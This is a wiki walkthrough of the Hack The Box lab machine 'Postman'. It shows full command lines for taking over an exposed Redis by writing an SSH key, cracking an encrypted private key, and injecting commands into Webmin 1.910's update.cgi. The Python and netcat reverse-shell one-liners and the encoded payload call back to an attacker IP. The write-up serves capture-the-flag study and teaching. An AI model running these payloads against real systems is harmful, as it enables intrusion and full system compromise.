Postman

From Luniwiki
Jump to: navigation, search

Back

Postman01.png

Ports scan

u505@kali:~/HTB/Machines/Postman$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.160
[sudo] password for u505:


Starting masscan 1.0.5 at 2020-03-15 12:29:55 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Discovered open port 10000/udp on 10.10.10.160
Discovered open port 10000/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160

u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 08:30 EDT
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.86s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.65 seconds

u505@kali:~/HTB/Machines/Postman$ nmap -sC -sV -p 6379 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 08:36 EDT
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.040s latency).


PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 4.0.9


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.58 seconds

Port 80

Postman02.png 

u505@kali:~/HTB/Machines/Postman$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "js,html,txt" -f -t 50 -u http://10.10.10.160


 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )


Extensions: js, html, txt | HTTP method: get | Threads: 50 | Wordlist size: 18379


Error Log: /opt/utils/dirsearch/logs/errors-20-03-15_08-41-45.log


Target: http://10.10.10.160


[08:41:45] Starting:
[08:41:49] 403 -  292B  - /.html
[08:42:00] 200 -    4KB - /css/
[08:42:06] 200 -    3KB - /fonts/
[08:42:09] 403 -  293B  - /icons/
[08:42:09] 200 -    2KB - /images/
[08:42:09] 200 -    4KB - /index.html
[08:42:10] 200 -    3KB - /js/
[08:42:23] 403 -  301B  - /server-status/
[08:42:29] 200 -    8KB - /upload/


Task Completed

Nothing interesting here.

Port 10000

u505@kali:~/HTB/Machines/Postman$ searchsploit webmin 1.910
----------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                     |  Path
                                                                                   | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------- ----------------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)             | exploits/linux/remote/46984.rb
----------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

There is an exploit for this version of Webmin, but it needs an authenticated user.

Port 6379

There are several vectors to abuse redis (https://book.hacktricks.xyz/pentesting/6379-pentesting-redis)

  • Get Webshell
  • Get Reverse Shell—Crontab
  • Get SSH–Crackit

Get Webshell

This vector consists copying a (php) file to the web server path. This method doesn't work, because the redis user doesn't have rights to write on folder /var/www/html 

u505@kali:~/HTB/Machines/Postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/www/html
OK
10.10.10.160:6379> config set dbfilename redis.php
OK
10.10.10.160:6379> set test "<?php phpinfo(); ?>"
OK
10.10.10.160:6379> save
(error) ERR
10.10.10.160:6379> config set dir /var/lib/redis
OK

Get Reverse Shell—Crontab

This vector try to create a crontab file to open a reverse shell. 

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

u505@kali:~/HTB/Machines/Postman$ echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.21\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.10.10.160 -x set 1
OK
u505@kali:~/HTB/Machines/Postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/spool/cron/crontabs/
(error) ERR Changing directory: Permission denied
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"

As expected from our previous attempt, this method doesn't work neither, because the redis user cannot write in folder /var/spool/cron/crontabs.

Get SSH–Crackit

This method try to push a ssh key to the server to gain access by ssh. 

u505@kali:~/HTB/Machines/Postman$ ssh-keygen -t rsa -f postman
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in postman
Your public key has been saved in postman.pub
The key fingerprint is:
SHA256:5WoRiY1eB6AMHnB9KFCikDDvs3un3EcIIxAzzMmJyHs u505@kali
The key's randomart image is:
+---[RSA 3072]----+
|^*B. ....        |
|B/.+o..+ o       |
|..+.o.o = o      |
| o.Eo. . =       |
|  +. o..S .      |
|   o  . .o       |
|  .    .o        |
|   o.....        |
|  ..oo..         |
+----[SHA256]-----+
u505@kali:~/HTB/Machines/Postman$ (echo -e "\n\n"; cat postman.pub; echo -e "\n\n") > public.txt
u505@kali:~/HTB/Machines/Postman$ cat public.txt | redis-cli -h 10.10.10.160 -x set crackit
OK
u505@kali:~/HTB/Machines/Postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> get crackit
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDhFUvl8fSLbgMtIXver1r5WscFfmthAs/CEknwXyjsOzdt5k9THjGB8OOfN1OlMzrtnh/nCCt9VyUbPNJcC6Xq6Gr9sO9r5TDFK3G/q1lWJcQB/nUvOW281A13NU0NF+lX+X/gI+SxMLmkEU29e0H3IZLfsAvodvVLJIDwPUBWPVqYG7ugEOG/NkrTOnSaXyjdcf+N/isJjBcXroC5mveo4k5hpE3kN6CUy65zjxgyNlHxgs+XStt5Pm7RyNndVNu8ZYprZ5OqfzUCms5JtEtR/pX66l41PG4Ex5YyzTO/9Gp9XDPFffe590RcTqPiwwHM3lmFgNsC6OOhO2JgJF7c8dsNe9L5Oa2572eZgAx/pQgakoTTPuzHK6BkKM2A7fv2vwk4CFZLNQAlVQ7gq0JGWXjfqA6IKFwLaak+WhNlJmsdrziaRAjaDELPnh9BNax1uTum3toIG9J2wpqdBwNAsNxEQF/dggoSAKsHfKGu8Tys1RNnJGPyKsdYF8uSh68= u505@kali\n\n\n\n"
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> config get dbfilename
1) "dbfilename"
2) "authorized_key"
10.10.10.160:6379> save
OK

If the file has been correctly written, we should access by ssh. 

u505@kali:~/HTB/Machines/Postman$ ssh -i postman redis@10.10.10.160
Enter passphrase for key 'postman':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)


 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage




 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ whoami
redis

Lateral movement

The kernel is modern, and the user redis cannot execute sudo commands without password. 

redis@Postman:~$ uname -a
Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
redis@Postman:~$ sudo -l
[sudo] password for redis:
sddsa
Sorry, try again.
[sudo] password for redis:
sdasd
Sorry, try again.
[sudo] password for redis:
sudo: 3 incorrect password attempts

bash_history

redis@Postman:~$ cat .bash_history
exit
su Matt
pwd
nano scan.py
python scan.py
nano scan.py
clear
nano scan.py
clear
python scan.py
exit
exit
cat /etc/ssh/sshd_config
su Matt
clear
cd /var/lib/redis
su Matt
exit
cat id_rsa.bak
ls -la
exit
cat id_rsa.bak
exit
ls -la
crontab -l
systemctl enable redis-server
redis-server
ifconfig
netstat -a
netstat -a
netstat -a
netstat -a
netstat -a > txt
exit
crontab -l
cd ~/
ls
nano 6379
exit
whoami

Upload pspy64 and LinEnum.sh

u505@kali:~/HTB/Machines/Postman$ cd utils/
u505@kali:~/HTB/Machines/Postman/utils$ scp -i ../postman pspy64 LinEnum.sh redis@10.10.10.160:/tmp/
Enter passphrase for key '../postman':
pspy64                                                                                    100% 3006KB   4.3MB/s   00:00
LinEnum.sh                                                                                100%   46KB   1.1MB/s   00:00

The tool pspy64 doesn't show any scheduled job. 

redis@Postman:/tmp$ chmod +x pspy64 LinEnum.sh
redis@Postman:/tmp$ ./LinEnum.sh
...
[-] Location and Permissions (if accessible) of .bak file(s):
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak
-rw------- 1 root root 695 Aug 25  2019 /var/backups/group.bak
-rw------- 1 root shadow 577 Aug 25  2019 /var/backups/gshadow.bak
-rw------- 1 root shadow 935 Aug 26  2019 /var/backups/shadow.bak
-rw------- 1 root root 1382 Aug 25  2019 /var/backups/passwd.bak

LinEnum find the file id_rsa.bak from the bash_history

Private key

u505@kali:~/HTB/Machines/Postman$ scp -i postman redis@postman:/opt/id_rsa.bak matt
The authenticity of host 'postman (10.10.10.160)' can't be established.
ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'postman' (ECDSA) to the list of known hosts.
Enter passphrase for key 'postman':
id_rsa.bak                                                                                100% 1743    42.2KB/s   00:00

The private key is encrypted. 

u505@kali:~/HTB/Machines/Postman$ head -n 7 matt
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C


JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6

We force brute the key with john. 

u505@kali:~/HTB/Machines/Postman$ /usr/share/john/ssh2john.py matt > matt.hash
u505@kali:~/HTB/Machines/Postman$ john matt.hash -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2020-03-15 10:22) 0.1845g/s 2646Kp/s 2646Kc/s 2646KC/s *7¡Vamos!
Session completed

We ssh with the user matt. 

u505@kali:~/HTB/Machines/Postman$ chmod 600 matt
u505@kali:~/HTB/Machines/Postman$ ssh -i matt matt@postman
Enter passphrase for key 'matt':
Connection closed by 10.10.10.160 port 22

But the server closes our session :( If we check sshd_config, we find that the user Matt has been denied to ssh the server. 

redis@Postman:/tmp$ tail -n 20 /etc/ssh/sshd_config
#VersionAddendum none


#deny users
DenyUsers Matt


# no default banner path
#Banner none


# Allow client to pass locale environment variables
AcceptEnv LANG LC_*


# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server


# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server

User flag

The ssh is not available, but we try to su the user Matt trying the same password than the private key. 

redis@Postman:/tmp$ su Matt
Password:
Matt@Postman:/tmp$ whoami
Matt
Matt@Postman:/tmp$ cd
Matt@Postman:~$ cat user.txt
<USER_FLAG>

Escalation of privileges

Reusing Matt credentials, we access Webmin.

Postman03.png

There is an metasploit module to gain a shell with the vulnerability previously screened. But it can be done manually. Reading the paper Webmin 1.910 - Remote Code Execution using BurpSuite, we can run commands with the update cgi.

Prepare the payload

The netcat on the server doesn't allow the switch -e, so we need the alternative command for the nc. 

u505@kali:~/HTB/Machines/Postman$ echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f" > payload.1
u505@kali:~/HTB/Machines/Postman$ cat payload.1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 4444 >/tmp/f

We transform these commands on base 64 format. 

u505@kali:~/HTB/Machines/Postman$ cat payload.1 | base64 -w 0 > payload.b64
u505@kali:~/HTB/Machines/Postman$ cat payload.b64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTQuMjEgNDQ0NCA+L3RtcC9m

The payload is wrapped with the base64 decoding. 

u505@kali:~/HTB/Machines/Postman$ echo " | bash -c \"{echo,`cat payload.pl.b64`}|{base64,-d}|{bash,-i}\"" > payload.raw
u505@kali:~/HTB/Machines/Postman$ cat payload.raw
 | bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMTo0NDQ0Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Oyc=}|{base64,-d}|{bash,-i}"

The payload is URL encoded. 

u505@kali:~/HTB/Machines/Postman$ . /opt/utils/urlencode/gistfile1.sh
u505@kali:~/HTB/Machines/Postman$ urlencode "`cat payload.raw`" > payload.url
u505@kali:~/HTB/Machines/Postman$ cat payload.url
%20%7C%20bash%20%2Dc%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMTo0NDQ0Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0%2BZmRvcGVuKCRjLHcpO3doaWxlKDw%2BKXtpZigkXz1%2BIC8oLiopLyl7c3lzdGVtICQxO319Oyc%3D%7D%7C%7Bbase64%2C%2Dd%7D%7C%7Bbash%2C%2Di%7D%22

Open the listener

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Update package and tamper the request

We browse to Software package update screen, and we intercept the request with Burp.

Postman04.png

We intercept the update.cgi request.

Postman05.png

We modify the content with with u=acl%2Fapt&u= and our payload

Postman06.png

The root reverse shell is opened. 

u505@kali:~/HTB/Machines/Postman$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.160.
Ncat: Connection from 10.10.10.160:41798.
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@Postman:/usr/share/webmin/package-updates/# stty raw -echo
stty raw -echo

Postman07.png

Root flag

root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 13:10, 15 March 2020 (EDT)

Retrieved from "https://wiki.luniel.com/mediawiki/index.php?title=Postman&oldid=5689"